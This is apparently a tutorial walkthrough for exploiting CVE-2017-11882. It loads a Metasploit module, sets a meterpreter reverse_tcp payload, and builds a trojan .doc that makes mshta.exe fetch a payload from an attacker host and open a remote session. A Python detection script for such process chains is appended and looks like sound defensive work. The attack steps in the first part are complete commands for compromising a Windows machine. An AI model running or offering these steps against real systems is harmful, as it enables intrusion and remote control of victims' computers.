1. First, download the CVE-2017-11882 exploit script.

2. Then move the exploit script into the corresponding msf directory.

Move PS_shell.rb to /usr/share/metasploit-framework/modules/exploits/windows/local/:

mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/local/

3. Start msf and search for the exploit script.

search PS_shell

4. Then select the exploit script you want to use and view its parameters.

msf > use exploit/windows/local/PS_shell

5. Then configure it and start the attack.

msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp

msf exploit(PS_shell) > set lhost 192.168.88.131

msf exploit(PS_shell) > set URIPATH wet

msf exploit(PS_shell) > exploit

6. Go to the directory containing the CVE-2017-11882 exploit script and generate the doc trojan.

python Command_CVE-2017-11882.py -c "mshta.exe http://192.168.88.131:8080/wet" -o kd.doc

7. Put the doc on the target machine and run it, then return to Kali to see the result.

8. As the figure shows, a session was established successfully. Next, we connect to it.

sessions -i 1
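
Seen from the target host, the chain above leaves a clear process-creation trail: opening the doc from step 6 makes the Office Equation Editor (EQNEDT32.EXE, the component affected by CVE-2017-11882) start mshta.exe with a remote URL. The following is an added detection example, not part of the original walkthrough; the Sysmon-style field names, the rule names and the sample events are constructed assumptions.

```python
import json
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe"}  # the host binary named in step 6's command
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events (Sysmon Event ID 1 field names), one JSON object per line.
SAMPLE_LOG = r"""
{"Host":"ws01","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe http://192.168.88.131:8080/wet","ParentImage":"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE"}
{"Host":"ws02","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe C:\\Tools\\inventory.hta","ParentImage":"C:\\Windows\\explorer.exe"}
{"Host":"ws03","Image":"C:\\Windows\\System32\\MSHTA.EXE","CommandLine":"MSHTA.EXE \"https://updates.example.invalid/a.hta\"","ParentImage":"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"}
{"Host":"ws04","Image":"C:\\Windows\\splwow64.exe","CommandLine":"C:\\Windows\\splwow64.exe 8192","ParentImage":"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"}
this line is not JSON and must be skipped
"""

def exe_name(path):
    return PureWindowsPath(path).name.lower()  # e.g. 'mshta.exe'

def classify(event):
    """Return (rule, urls) for a suspicious process creation, else None."""
    parent = exe_name(event.get("ParentImage", ""))
    child = exe_name(event.get("Image", ""))
    urls = URL_RE.findall(event.get("CommandLine", ""))
    # The Equation Editor has no normal reason to start other programs.
    if parent == "eqnedt32.exe":
        return ("eqnedt32-child:" + child, urls)
    # An Office application launching a script host against a remote URL.
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS and urls:
        return ("office-remote-script-host:" + child, urls)
    return None

def scan(log_text):
    """Parse JSON-lines process events and return [(host, rule, urls), ...]."""
    alerts = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or malformed line
        hit = classify(event) if isinstance(event, dict) else None
        if hit:
            alerts.append((event.get("Host", "?"), hit[0], hit[1]))
    return alerts

if __name__ == "__main__":
    for host, rule, urls in scan(SAMPLE_LOG):
        print(host, rule, ", ".join(urls))
```

The URLs extracted from the command line give responders the staging address to block and to search for in proxy logs.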